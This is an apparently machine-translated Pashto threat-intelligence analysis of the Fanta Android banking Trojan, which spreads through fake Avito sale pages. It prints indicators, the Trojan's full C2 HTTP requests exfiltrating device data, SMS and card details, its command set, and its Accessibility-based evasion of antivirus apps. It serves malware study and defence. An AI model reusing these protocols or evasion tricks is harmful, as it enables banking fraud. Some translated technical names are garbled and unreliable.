یوه ورځ تاسو غواړئ په Avito کې یو څه وپلورئ او د خپل محصول تفصيلي توضیحات پوسټ کړئ (د مثال په توګه ، د رام ماډل) ، تاسو به دا پیغام ترلاسه کړئ:
یوځل چې تاسو لینک خلاص کړئ، تاسو به یو داسې بې ګناه پاڼه وګورئ چې تاسو خوشحاله او بریالي پلورونکي ته خبر ورکوي چې پیرود شوی دی:
یوځل چې تاسو د "دوام" تڼۍ کلیک وکړئ ، د آیکن او د باور الهام ورکونکي نوم سره د APK فایل به ستاسو د Android وسیلې ته ډاونلوډ شي. تاسو یو اپلیکیشن نصب کړی چې د کوم دلیل لپاره یې د لاسرسي خدماتو حقونو غوښتنه کړې ، بیا یو څو کړکۍ راڅرګندې شوې او په چټکۍ سره ورکې شوې او ... بس.
تاسو د خپل بیلانس چک کولو لپاره ځئ، مګر د ځینو دلیلونو لپاره ستاسو بانکي ایپ ستاسو د کارت توضیحات بیا غوښتنه کوي. د معلوماتو د ننوتلو وروسته، یو څه ناوړه پیښیږي: د ځینو دلیلونو لپاره چې تاسو ته لا تر اوسه روښانه نه ده، پیسې ستاسو د حساب څخه ورکیدل پیل کوي. تاسو هڅه کوئ چې ستونزه حل کړئ، مګر ستاسو تلیفون مقاومت کوي: دا د "شاته" او "کور" کیلي فشاروي، نه بندوي او تاسو ته اجازه نه ورکوي چې کوم امنیتي اقدامات فعال کړئ. په پایله کې، تاسو پرته له پیسو پاتې یاست، ستاسو توکي نه دي اخیستل شوي، تاسو ګډوډ او حیران یاست: څه پیښ شوي؟
ځواب ساده دی: تاسو د فانټا Android Trojan قرباني شوي یاست، د Flexnet کورنۍ غړی. دا څنګه وشول؟ راځئ چې اوس تشریح کړو.
لیکوالان: اندری پولوینکین، د مالویر تحلیل کې ځوان متخصص ، ایوان پساریف، د مالویر تحلیل کې متخصص.
ځینې احصایې
د Android Trojans Flexnet کورنۍ لومړی په 2015 کې پیژندل شوې. د اوږدې مودې فعالیت په جریان کې، کورنۍ ډیری فرعي ډولونو ته پراختیا ورکړه: فانټا، لیمبوټ، لیپټن، او داسې نور. ټروجن، او همدارنګه د دې سره تړلې زیربناوې، لاهم ولاړ نه دي: د توزیع نوي اغیزمن سکیمونه رامینځته کیږي - زموږ په قضیه کې، د لوړ کیفیت فشینګ پاڼې د یو ځانګړي کارونکي پلورونکي په هدف، او د ټروجن پراختیا کونکي د فیشن رجحانات تعقیبوي. د ویروس لیکل - د نوي فعالیت اضافه کول چې دا ممکنه کوي چې په اغیزمنه توګه د اخته وسیلو څخه پیسې غلا کړي او د محافظت میکانیزمونو مخه ونیسي.
په دې مقاله کې تشریح شوي کمپاین د روسیې څخه د کاروونکو هدف دی؛ په اوکراین کې د اخته شوي وسایلو لږ شمیر ثبت شوي، او حتی په قزاقستان او بیلاروس کې لږ شمیر.
که څه هم Flexnet اوس د 4 کلونو څخه د Android Trojan په ډګر کې دی او د ډیری څیړونکو لخوا په تفصیل سره مطالعه شوی، دا لاهم په ښه حالت کې دی. د 2019 د جنوري څخه پیل کیږي، د زیان احتمالي اندازه د 35 ملیون روبلو څخه ډیر دی - او دا یوازې په روسیه کې د کمپاینونو لپاره دی. په 2015 کې، د دې Android Trojan مختلف نسخې د ځمکې لاندې فورمونو کې وپلورل شوې، چیرې چې د تفصيلي توضیحاتو سره د Trojan سرچینې کوډ هم موندل کیدی شي. دا پدې مانا ده چې په نړۍ کې د زیانونو احصایې حتی خورا اغیزمنې دي. د داسې زاړه سړي لپاره بد شاخص ندی، دا نه دی؟
له پلور څخه تر فریب پورې
لکه څنګه چې د اعلاناتو پوسټ کولو لپاره د انټرنیټ خدمت لپاره د فیشینګ پا pageې وړاندې وړاندې شوي سکرین شاټ څخه لیدل کیدی شي Avito ، دا د ځانګړي قرباني لپاره چمتو شوی و. په ښکاره ډول ، برید کونکي د Avito یو له پارسرونو څخه کار اخلي ، کوم چې د تلیفون شمیره او د پلورونکي نوم استخراج کوي ، او همدارنګه د محصول توضیحات. د پاڼې پراخولو او د APK فایل چمتو کولو وروسته، قرباني ته د هغه نوم او د فشینګ پاڼې لینک سره یو ایس ایم ایس لیږل کیږي چې د هغه د محصول توضیحات او د محصول "پلور" څخه ترلاسه شوي مقدار لري. د تڼۍ په کلیک کولو سره، کاروونکي ناوړه APK فایل ترلاسه کوي - فانټا.
د shcet491 [.]ru ډومین مطالعې ښودلې چې دا د Hostinger DNS سرورونو ته سپارل شوی:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
د ډومین زون فایل د IP پتې 31.220.23 [.]236، 31.220.23[.]243، او 31.220.23[.]235 ته اشاره کوي داخلې لري. په هرصورت، د ډومین لومړنۍ سرچینې ریکارډ (A ریکارډ) د IP پته 178.132.1 سره سرور ته اشاره کوي [.]240.
د IP پته 178.132.1[.]240 په هالنډ کې موقعیت لري او د کوربه پورې اړه لري ورلډ سټریم. IP پتې 31.220.23[.]235، 31.220.23[.]236 او 31.220.23[.]243 په انګلستان کې موقعیت لري او د شریک کوربه سرور HOSTINGER پورې اړه لري. د ریکارډر په توګه کارول کیږي openprov-ru. لاندې ډومینونه هم د IP پتې 178.132.1 ته حل شوي [.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
دا باید په یاد ولرئ چې په لاندې شکل کې لینکونه د نږدې ټولو ډومینونو څخه شتون درلود:
http://(www.){0,1}<%domain%>/[0-9]{7}
پدې کېنډۍ کې د SMS پیغام څخه لینک هم شامل دی. د تاریخي معلوماتو پراساس، دا وموندل شوه چې یو ډومین په پورته بیان شوي نمونه کې د څو لینکونو سره مطابقت لري، کوم چې دا په ګوته کوي چې یو ډومین د څو قربانیانو لپاره د Trojan ویشلو لپاره کارول کیده.
راځئ چې یو څه مخکې لاړ شو: ټروجن د SMS څخه د لینک له لارې ډاونلوډ شوی پته د کنټرول سرور په توګه کاروي onusedseddohap[.]کلب. دا ډومین په 2019-03-12 کې راجستر شوی، او د 2019-04-29 څخه پیل شوی، د APK غوښتنلیکونه د دې ډومین سره اړیکه لري. د VirusTotal څخه ترلاسه شوي معلوماتو پراساس، ټول 109 غوښتنلیکونه د دې سرور سره اړیکه لري. ډومین پخپله د IP پتې ته حل کړ 217.23.14[.]27په هالنډ کې موقعیت لري او د کوربه ملکیت دی ورلډ سټریم. د ریکارډر په توګه کارول کیږي نوم بدلول. ډومینونه هم د دې IP پتې ته حل شوي بد ریکون [.]کلب (د 2018-09-25 څخه پیل کیږي) او بد ریکون [.]ژوند (د 2018-10-25 څخه پیل کیږي). د ډومین سره بد ریکون [.]کلب له 80 څخه ډیر APK فایلونه متقابل عمل بد ریکون [.]ژوند - له 100 څخه ډیر.
په عموم کې، برید په لاندې ډول پرمخ ځي:
د فانتا د پوښ لاندې څه دي؟
د ډیری نورو Android Trojans په څیر، فانټا د SMS پیغامونو لوستلو او لیږلو وړتیا لري، د USSD غوښتنې کوي، او د غوښتنلیکونو په سر کې خپل وینډوز ښکاره کوي (د بانکدارۍ په شمول). په هرصورت، د دې کورنۍ د فعالیت ارسنال راورسیده: فانتا کارول پیل کړل د لاسرسي خدمت د مختلف اهدافو لپاره: د نورو غوښتنلیکونو څخه د خبرتیاو مینځپانګې لوستل ، د کشف مخه نیول او په اخته شوي وسیله کې د ټروجن اجرا کول ، او داسې نور. فانټا د Android په ټولو نسخو کې کار کوي چې له 4.4 څخه کم نه وي. پدې مقاله کې به موږ لاندې فانټا نمونې ته نږدې کتنه وکړو:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- شاکونیمکس: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- شاکونیمکس: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
د پیل څخه سمدستي وروسته
د لانچ څخه سمدلاسه وروسته ، ټروجن خپل عکس پټوي. غوښتنلیک یوازې کار کولی شي که چیرې د اخته شوي وسیلې نوم په لیست کې نه وي:
- اندروید_ x86
- ویډیو
- Nexus 5X (بیل هیډ)
- Nexus 5 (استره)
دا چک د ټروجن اصلي خدمت کې ترسره کیږي - اصلي خدمت. کله چې د لومړي ځل لپاره پیل شو ، د غوښتنلیک ترتیب کولو پیرامیټرې ډیفالټ ارزښتونو ته پیل کیږي (د ترتیب کولو ډیټا ذخیره کولو بڼه او د دوی معنی به وروسته په اړه بحث وشي) ، او د کنټرول سرور کې نوی اخته شوی وسیله ثبت کیږي. د پیغام ډول سره د HTTP پوسټ غوښتنه به سرور ته واستول شي register_bot او د اخته شوي وسیلې په اړه معلومات (د اندروید نسخه، IMEI، د تلیفون شمیره، د چلونکي نوم او د هیواد کوډ په کوم کې چې آپریټر راجستر شوی). پته د کنټرول سرور په توګه کار کوي hXXp://onuseseddohap[.]club/controller.php. په ځواب کې، سرور یو پیغام لیږي چې ساحې لري bot_id, bot_pwd, سرور - غوښتنلیک دا ارزښتونه د CnC سرور پیرامیټرو په توګه خوندي کوي. پیرامیټر سرور اختیاري که چیرې ساحه نه وي ترلاسه شوې: فانټا د راجسټریشن پته کاروي - hXXp://onuseseddohap[.]club/controller.php. د CnC پته بدلولو فعالیت د دوه ستونزو حل کولو لپاره کارول کیدی شي: د څو سرورونو ترمینځ په مساوي ډول د بار ویشلو لپاره (د لوی شمیر اخته وسیلو سره ، په غیر مطلوب ویب سرور کې بار لوړ کیدی شي) ، او همدارنګه د بدیل کارولو لپاره. د CnC سرورونو څخه د یوې ناکامۍ په صورت کې سرور.
که چیرې د غوښتنې لیږلو پرمهال کومه تېروتنه رامنځته شي، ټروجن به د 20 ثانیو وروسته د راجستریشن پروسه تکرار کړي.
یوځل چې وسیله په بریالیتوب سره ثبت شي ، فانټا به لاندې پیغام کارونکي ته وښیې:
مهم یادونه: خدمت بلل کیږي د سیسټم امنیت - د ټروجن خدمت نوم، او د تڼۍ کلیک کولو وروسته هوکی یوه کړکۍ به د اخته شوي وسیلې د لاسرسي ترتیباتو سره خلاص شي ، چیرې چې کارونکي باید د ناوړه خدمت لپاره د لاسرسي حقونه ورکړي:
هرڅومره ژر چې کاروونکي فعال شي د لاسرسي خدمتفانټا د اپلیکیشن وینډوز مینځپانګې او په دوی کې ترسره شوي عملونو ته لاسرسی ترلاسه کوي:
د لاسرسي حق ترلاسه کولو سمدلاسه وروسته ، ټروجن د خبرتیا لوستلو لپاره د مدیر حقونو او حقونو غوښتنه کوي:
د لاسرسي خدماتو په کارولو سره ، غوښتنلیک د کیسټروکونو ترکیب کوي ، په دې توګه ځان ته ټول اړین حقونه ورکوي.
فانټا ډیری ډیټابیس مثالونه رامینځته کوي (چې وروسته به تشریح شي) د ترتیب کولو ډیټا ذخیره کولو لپاره اړین دي ، او همدارنګه د اخته شوي وسیلې په اړه پروسې کې راټول شوي معلومات. د راټول شوي معلوماتو لیږلو لپاره، ټروجن یو تکراري دنده رامینځته کوي چې د ډیټابیس څخه ساحې ډاونلوډ کولو لپاره ډیزاین شوي او د کنټرول سرور څخه قومانده ترلاسه کوي. CnC ته د لاسرسي لپاره وقفه د Android نسخې پورې اړه لري: د 5.1 په حالت کې ، وقفه به 10 ثانیې وي ، که نه نو 60 ثانیې.
د قوماندې ترلاسه کولو لپاره، فانټا غوښتنه کوي GetTask د مدیریت سرور ته. په ځواب کې، CnC کولی شي د لاندې کمانډونو څخه یو واستوي:
| ټیم | شرح |
|---|---|
| 0 | د SMS پیغام واستوئ |
| 1 | یو تلیفون زنګ ووهئ یا د USSD کمانډ وکړئ |
| 2 | پیرامیټر تازه کوي منځګړی |
| 3 | پیرامیټر تازه کوي مداخله |
| 6 | پیرامیټر تازه کوي د ایس ایم ایس مدیر |
| 9 | د SMS پیغامونو راټولول پیل کړئ |
| 11 | خپل تلیفون د فابریکې ترتیباتو ته بیا تنظیم کړئ |
| 12 | د ډیالوګ بکس رامینځته کولو لاګنګ فعال / غیر فعال کړئ |
فانټا د 70 بانکي ایپسونو ، ګړندي تادیې سیسټمونو او ای والټونو څخه خبرتیاوې هم راټولوي او په ډیټابیس کې یې ساتي.
د تنظیم کولو پیرامیټونو ذخیره کول
د ترتیب کولو پیرامیټونو ذخیره کولو لپاره، فانټا د Android پلیټ فارم لپاره معیاري طریقه کاروي - غوره توبونه- فایلونه ترتیبات به په نوم فایل کې خوندي شي امستنې. د خوندي شوي پیرامیټونو توضیحات په لاندې جدول کې دي.
| نوم | ډیفالټ ارزښت | ممکنه ارزښتونه | شرح |
|---|---|---|---|
| id | 0 | انټرنټ | د بوټ ID |
| سرور | hXXp://onuseseddohap[.]club/ | URL | د کنټرول سرور پته |
| pwd | - | تار | د سرور پټنوم |
| منځګړی | 20 | انټرنټ | د وخت وقفه. دا په ګوته کوي چې لاندې دندې باید څومره وخت وځنډول شي:
|
| مداخله | ټول | ټول/telNumber | که ساحه د تار سره مساوي وي ټول او یا د ټیلیفون شمیره، بیا ترلاسه شوی SMS پیغام به د غوښتنلیک لخوا ودرول شي او کارونکي ته نه ښودل کیږي |
| د ایس ایم ایس مدیر | 0 | 0/1 | غوښتنلیک د ډیفالټ SMS ترلاسه کونکي په توګه فعال/غیر فعال کړئ |
| د لوستلو ډیالوګ | غلط | سم او ناسم | د پیښې لاګنګ فعال / غیر فعال کړئ د لاسرسي پیښه |
Fanta هم دوتنې کاروي د ایس ایم ایس مدیر:
| نوم | ډیفالټ ارزښت | ممکنه ارزښتونه | شرح |
|---|---|---|---|
| pckg | - | تار | د SMS پیغام مدیر نوم کارول شوی |
د ډیټابیسونو سره تعامل
د دې عملیاتو په جریان کې، ټروجن دوه ډیټابیسونه کاروي. ډیټابیس نومول شوی a د تلیفون څخه راټول شوي مختلف معلومات ذخیره کولو لپاره کارول کیږي. دوهم ډیټابیس نومول شوی fanta.db او د بانک کارتونو په اړه د معلوماتو راټولولو لپاره ډیزاین شوي د فشینګ وینډوز رامینځته کولو لپاره مسؤل ترتیبات خوندي کولو لپاره کارول کیږي.
ټروجن ډیټابیس کاروي а راټول شوي معلومات ذخیره کول او خپل عملونه ثبت کړئ. معلومات په میز کې ساتل کیږي يادښتونه. د جدول جوړولو لپاره، لاندې SQL پوښتنې وکاروئ:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)ډیټابیس لاندې معلومات لري:
1. د پیغام سره د اخته شوي وسیلې د پیل پیل کول ټلیفون چالان شو!
2. د غوښتنلیکونو څخه خبرتیاوې. پیغام د لاندې ټیمپلیټ له مخې رامینځته شوی:
(<%App Name%>)<%Title%>: <%Notification text%>
3. د ټروجن لخوا رامینځته شوي د فشینګ فارمونو څخه د بانک کارت ډیټا. پیرامیټر VIEW_NAME کیدای شي یو له لاندې څخه وي:
- AliExpress
- ایوټو
- ګوګل پلی
- متفرقه <%د اپلیکیشن نوم%>
پیغام په شکل کې ننوتلی دی:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. د ایس ایم ایس پیغامونه په بڼه کې:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. د کڅوړې په اړه معلومات چې په بڼه کې د ډیالوګ بکس جوړوي:
(<%Package name%>)<%Package information%>
بیلګه جدول يادښتونه:
د فنټا یو فعالیت د بانکي کارتونو په اړه د معلوماتو راټولول دي. د معلوماتو راټولول د فشینګ وینډوز رامینځته کولو له لارې پیښیږي کله چې د بانکي غوښتنلیکونو خلاصول. ټروجن یوازې یو ځل د فشینګ کړکۍ رامینځته کوي. هغه معلومات چې کړکۍ کارونکي ته ښودل شوي په میز کې ساتل کیږي امستنې په ډیټابیس کې fanta.db. د ډیټابیس جوړولو لپاره، لاندې SQL پوښتنې وکاروئ:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);ټول د میز ساحې امستنې په ډیفالټ ډول 1 ته پیل شوی (د فشینګ کړکۍ رامینځته کړئ). وروسته له دې چې کاروونکي خپل ډاټا ته ننوځي، ارزښت به 0 ته وټاکل شي. د میز ساحو مثال امستنې:
- کولی شئ_لاګ ان - ساحه د بانکي غوښتنلیک پرانستلو په وخت کې د فورمې ښودلو مسولیت لري
- لومړی_بانک - نه کارول کیږي
- can_avito - ساحه د Avito غوښتنلیک پرانیستلو پر مهال د فورمې ښودلو مسولیت لري
- can_ali - ساحه د Aliexpress غوښتنلیک پرانیستلو پر مهال د فورمې ښودلو مسولیت لري
- بل کولی شي - ساحه د فارم د ښودلو مسولیت لري کله چې د لیست څخه کوم غوښتنلیک خلاصوي: یولا، پانډاو، ډروم آټو، والټ. تخفیف او بونس کارتونه، Aviasales، بکینګ، Trivago
- can_card - ساحه د پرانیستلو په وخت کې د فورمې ښودلو مسولیت لري ګوګل پلی
د مدیریت سرور سره تعامل
د مدیریت سرور سره د شبکې تعامل د HTTP پروتوکول له لارې پیښیږي. د شبکې سره د کار کولو لپاره، فانټا مشهور Retrofit کتابتون کاروي. غوښتنلیکونه لیږل کیږي: hXXp://onuseseddohap[.]club/controller.php. د سرور پته بدل کیدی شي کله چې په سرور کې راجستر کیږي. کوکیز ممکن د سرور څخه په ځواب کې واستول شي. فانټا سرور ته لاندې غوښتنې کوي:
- په کنټرول سرور کې د بوټ راجسټریشن یوځل پیښیږي ، د لومړي لانچ پرمهال. د اخته شوي وسیلې په اړه لاندې معلومات سرور ته لیږل کیږي:
· کوکی - کوکیز له سرور څخه ترلاسه شوي (ډیفالټ ارزښت یو خالي تار دی)
· اکر - ثابت تار register_bot
· مختاړی - ثابت عدد 2
· نسخه_sdk - د لاندې نمونې سره سم جوړ شوی: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· imei - د اخته شوي وسیلې IMEI
· هیواد - د هغه هیواد کوډ په کوم کې چې آپریټر راجستر شوی، په ISO بڼه کې
· شمیر - د تلیفون شمیره
· Operator د - د چلونکي نومد غوښتنې یوه بیلګه چې سرور ته لیږل شوي:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>د غوښتنې په ځواب کې، سرور باید د JSON څیز بیرته راولي چې لاندې پیرامیټونه لري:
bot_id - د اخته شوي وسیلې ID. که bot_id د 0 سره مساوي وي، فانټا به غوښتنه بیا اجرا کړي.
bot_pwd - د سرور لپاره پټنوم.
سرور - د سرور ادرس کنټرول کړئ. اختیاري پیرامیټر. که پیرامیټر مشخص شوی نه وي، په غوښتنلیک کې خوندي شوی پته به وکارول شي.د JSON څیز بېلګه:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- د سرور څخه د قوماندې ترلاسه کولو غوښتنه وکړئ. لاندې معلومات سرور ته لیږل کیږي:
· کوکی - کوکیز له سرور څخه ترلاسه شوي
· داوطلبۍ - د اخته شوي وسیلې ID چې د غوښتنې لیږلو پرمهال ترلاسه شوی و register_bot
· pwd - د سرور لپاره پټنوم
· divice_admin - ساحه ټاکي چې ایا د مدیر حقونه ترلاسه شوي که نه. که چیرې د مدیر حقونه ترلاسه شوي وي، ساحه مساوي ده 1بل ډول 0
· د لار موندنې - د لاسرسي خدماتو عملیات حالت. که خدمت پیل شوی وي، ارزښت دی 1بل ډول 0
· د SMS مدیر - ښیې چې ایا Trojan د SMS ترلاسه کولو لپاره د ډیفالټ غوښتنلیک په توګه فعال شوی
· پرده - ښکاره کوي چې سکرین په کوم حالت کې دی. ارزښت به ټاکل کیږي 1، که پرده روانه وي، بل ډول 0;د غوښتنې یوه بیلګه چې سرور ته لیږل شوي:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>په قوماندې پورې اړه لري، سرور کولی شي د مختلف پیرامیټونو سره JSON څیز بیرته راولي:
· ټیم د SMS پیغام واستوئ: په پیرامیټونو کې د تلیفون شمیره، د SMS پیغام متن او د لیږل شوي پیغام ID شامل دي. پیژندونکی هغه وخت کارول کیږي کله چې سرور ته د ډول سره پیغام لیږل کیږي setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· ټیم یو تلیفون زنګ ووهئ یا د USSD کمانډ وکړئ: د تلیفون شمیره یا کمانډ د ځواب په بدن کې راځي.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· ټیم د وقفې پیرامیټر بدل کړئ.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· ټیم د مداخلې پیرامیټر بدل کړئ.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· ټیم د SmsManager ساحه بدل کړئ.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· ټیم د اخته شوي وسیلې څخه د SMS پیغامونه راټول کړئ.
{ "response": [ { "mode": 9 } ], "status":"ok" }· ټیم خپل تلیفون د فابریکې ترتیباتو ته بیا تنظیم کړئ:
{ "response": [ { "mode": 11 } ], "status":"ok" }· ټیم د ReadDialog پیرامیټر بدل کړئ.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- د ډول سره یو پیغام لیږل setSmsStatus. دا غوښتنه د قوماندې اجرا کیدو وروسته کیږي د SMS پیغام واستوئ. غوښتنه داسې ښکاري:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- د ډیټابیس مینځپانګې پورته کول. یو قطار په هره غوښتنه لیږدول کیږي. لاندې معلومات سرور ته لیږل کیږي:
· کوکی - کوکیز له سرور څخه ترلاسه شوي
· اکر - ثابت تار setSaveInboxSms
· داوطلبۍ - د اخته شوي وسیلې ID چې د غوښتنې لیږلو پرمهال ترلاسه شوی و register_bot
· متن - متن په اوسني ډیټابیس ریکارډ کې (فیلډ d له میز څخه يادښتونه په ډیټابیس کې а)
· شمیر - د اوسني ډیټابیس ریکارډ نوم (فیلډ p له میز څخه يادښتونه په ډیټابیس کې а)
· sms_mode - د عددي ارزښت (فیلډ m له میز څخه يادښتونه په ډیټابیس کې а)غوښتنه داسې ښکاري:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>که چیرې په بریالیتوب سره سرور ته واستول شي، قطار به له میز څخه حذف شي. د JSON څیز مثال چې د سرور لخوا بیرته راستانه شوی:
{ "response":[], "status":"ok" }
د لاسرسي خدماتو سره اړیکه
د لاسرسي خدمت پلي شوی ترڅو د معلولیت لرونکو خلکو لپاره د Android وسیلو کارول اسانه کړي. په ډیری مواردو کې، د غوښتنلیک سره د تعامل لپاره فزیکي تعامل ته اړتیا ده. د لاسرسي خدمت تاسو ته اجازه درکوي چې دا په برنامه توګه ترسره کړئ. فانټا دا خدمت کاروي ترڅو په بانکي غوښتنلیکونو کې جعلي وینډوز رامینځته کړي او کاروونکو ته د سیسټم تنظیماتو او ځینې غوښتنلیکونو خلاصولو مخه ونیسي.
د لاسرسي خدماتو فعالیت په کارولو سره ، ټروجن د اخته شوي وسیلې په سکرین کې عناصرو ته بدلونونه څاري. لکه څنګه چې مخکې تشریح شوي، د فانټا ترتیبات یو پیرامیټر لري چې د ډیالوګ بکسونو سره د ننوتلو عملیاتو لپاره مسؤل دی - د لوستلو ډیالوګ. که دا پیرامیټر تنظیم شوی وي ، د بسته بندۍ نوم او توضیحاتو په اړه معلومات چې پیښه یې رامینځته کړې ډیټابیس ته به اضافه شي. ټروجن لاندې کړنې ترسره کوي کله چې پیښې رامینځته کیږي:
- په لاندې قضیو کې د شا او کور کیلي فشارولو سمولټ:
· که چیرې کاروونکي غواړي خپل وسیله ریبوټ کړي
· که کاروونکي غواړي د "Avito" غوښتنلیک حذف کړي یا د لاسرسي حقونه بدل کړي
· که چیرې په پاڼه کې د "Avito" غوښتنلیک ذکر وي
· کله چې د ګوګل پلی محافظت غوښتنلیک خلاص کړئ
· کله چې د لاسرسي خدماتو ترتیباتو سره مخونه خلاص کړئ
· کله چې د سیسټم امنیت ډیالوګ بکس څرګند شي
· کله چې د "نور اپلیکیشن په اوږدو کې رسم کړئ" ترتیباتو سره پاڼه خلاص کړئ
· کله چې د "غوښتنلیکونو" پا pageې خلاصول ، "بیا راګرځول او بیا تنظیم کول" ، "ډیټا بیا تنظیم کول" ، "د تنظیماتو بیا تنظیم کول" ، "پراختیا کونکي پینل" ، "ځانګړي. فرصتونه"، "ځانګړي فرصتونه"، "ځانګړي حقونه"
· که چیرې پیښه د ځینې غوښتنلیکونو لخوا رامینځته شوې وي.د غوښتنلیکونو لیست
- اندروید
- ماسټر لایټ
- پاک ماسټر
- د x86 CPU لپاره پاک ماسټر
- د Meizu غوښتنلیک اجازې مدیریت
- د MIUI امنیت
- کلین ماسټر - انټي ویروس او کیچ او کثافات پاکونکی
- د والدینو کنټرول او GPS: کاسپرسکي سیف کیډز
- د کاسپرسکي انټي ویروس اپلاک او ویب امنیت بیټا
- د ویروس کلینر، انټي ویروس، کلینر (MAX امنیت)
- د ګرځنده انټي ویروس امنیت پرو
- د وایس انټي ویروس او وړیا محافظت 2019
- د ګرځنده امنیت میګافون
- د ایکسپریا لپاره د AVG محافظت
- د ګرځنده امنیت
- مال ویرزایټ انټي ویروس او محافظت کوي
- د Android 2019 لپاره انټي ویروس
- د امنیت ماسټر - انټي ویروس ، VPN ، اپلاک ، بوسټر
- د Huawei ټابلیټ سیسټم مدیر لپاره AVG انټي ویروس
- سامسونگ لاسرسی
- د سامسنګ سمارټ مدیر
- امنیت ماسټر
- د سرعت بوسټر
- ډاکټر ویب
- د ډاکټر ویب امنیت ځای
- د ډاکټر ویب ګرځنده کنټرول مرکز
- د ډاکټر ویب امنیت فضا ژوند
- د ډاکټر ویب ګرځنده کنټرول مرکز
- انټي ویروس او ګرځنده امنیت
- د کاسپرسکي انټرنیټ امنیت: انټي ویروس او ساتنه
- د کاسپرسکي بیټرۍ ژوند: سیور او بوسټر
- د کاسپرسکي پای ټکی امنیت - ساتنه او مدیریت
- AVG انټي ویروس وړیا 2019 - د Android لپاره محافظت
- د انټي ویروس Android
- د نورټن ګرځنده امنیت او انټي ویروس
- انټي ویروس، فایروال، VPN، ګرځنده امنیت
- د ګرځنده امنیت: انټي ویروس، VPN، د غلا محافظت
- د Android لپاره انټي ویروس
- که لنډ شمیر ته د ایس ایم ایس پیغام لیږلو په وخت کې د اجازې غوښتنه وشي، فانټا په چیک باکس کې کلیک کولو سره سمول کوي انتخاب په یاد ولرئ او تڼۍ لیږل.
- کله چې تاسو هڅه وکړئ د ټروجن څخه د مدیر حقونه واخلئ، دا د تلیفون سکرین بندوي.
- د نوي مدیرانو اضافه کولو مخه نیسي.
- که د انټي ویروس غوښتنلیک dr.web یو ګواښ کشف شو، فانټا د تڼۍ په فشارولو سره تقلید کوي له پامه غورځول.
- ټروجن د شا او کور تڼۍ فشارولو سره سمول کوي که چیرې پیښه د غوښتنلیک لخوا رامینځته شوې وي د سامسنګ وسیلې پاملرنه.
- فانټا د بانک کارتونو په اړه د معلوماتو داخلولو لپاره د فورمو سره فشینګ وینډوز رامینځته کوي که چیرې د شاوخوا 30 مختلف انټرنیټ خدماتو لیست څخه یو غوښتنلیک پیل شوی وي. د دوی په منځ کې: AliExpress، بکینګ، Avito، د ګوګل پلی مارکیټ اجزا، پانډاو، ډروم آټو، او داسې نور.
د فشینګ بڼې
فانټا تحلیل کوي چې کوم غوښتنلیکونه په اخته شوي وسیله روان دي. که چیرې د ګټو غوښتنلیک پرانیستل شي، ټروجن د نورو ټولو په سر کې د فشینګ کړکۍ ښکاره کوي، کوم چې د بانک کارت معلوماتو ته د ننوتلو فورمه ده. کارونکي باید لاندې معلومات داخل کړي:
- د کارت نمره
- د کارت د ختمیدو نیټه
- CVV
- د کارت لرونکي نوم (د ټولو بانکونو لپاره نه)
د چلولو غوښتنلیک پورې اړه لري، مختلف فشینګ کړکۍ به ښکاره شي. لاندې د دوی ځینې مثالونه دي:
الی ایکسپرس:
ایوټو:
د ځینو نورو غوښتنلیکونو لپاره، د بیلګې په توګه د ګوګل پلی بازار، Aviasales، Pandao، Booking، Trivago:
دا واقعیا څنګه وه
